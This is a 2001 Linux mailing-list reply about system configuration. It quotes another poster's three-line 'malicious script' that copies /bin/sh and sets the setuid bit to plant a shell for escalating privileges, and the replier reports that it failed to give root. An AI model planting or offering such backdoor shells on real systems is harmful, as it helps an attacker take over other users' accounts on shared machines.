[Linux-Discussion] Re: System Config question
- From: "Brian L. Johnson" <blj8@xxxxxxxx>
- To: <linux-discussion@xxxxxxxxxxxxx>
- Date: Fri, 18 May 2001 09:59:24 -0600 (MDT)
On May 18, Paul directed electrons to linux-discussion@xxxxxxxxxxxxx:
>A more useful malicious script:
>#!/bin/sh
>cp /bin/sh /home/malicioususer/.shells/`whoami`.sh
>chmod a+s /home/malicioususer/.shells/`whoami`.sh
>Now they have a setuid root shell.
Didn't work. The most I could do with that was create a file that was
user blj8 and group root, but that did not enable me to change any
root-owned files, and when in that shell, the whoami command still said
"blj8".
-=Brian L. Johnson, www.blj8.com=-
Total Bookmarks in file= 8615
---------------------------------
For PGP key email to: pgpkey@xxxxxxxx
For Geekcode email to: geekcode@xxxxxxxx
=============================================================
Avenir Web's Linux Discussion List
List info: //www.freelists.org/cgi-bin/webpage?webpage_id=13
To unsubscribe: email linux-discussion-request@xxxxxxxxxxxxx
with 'unsubscribe' in the Subject line.
Administrative contact: weez@xxxxxxxxxxxxx
=============================================================
Other related posts:
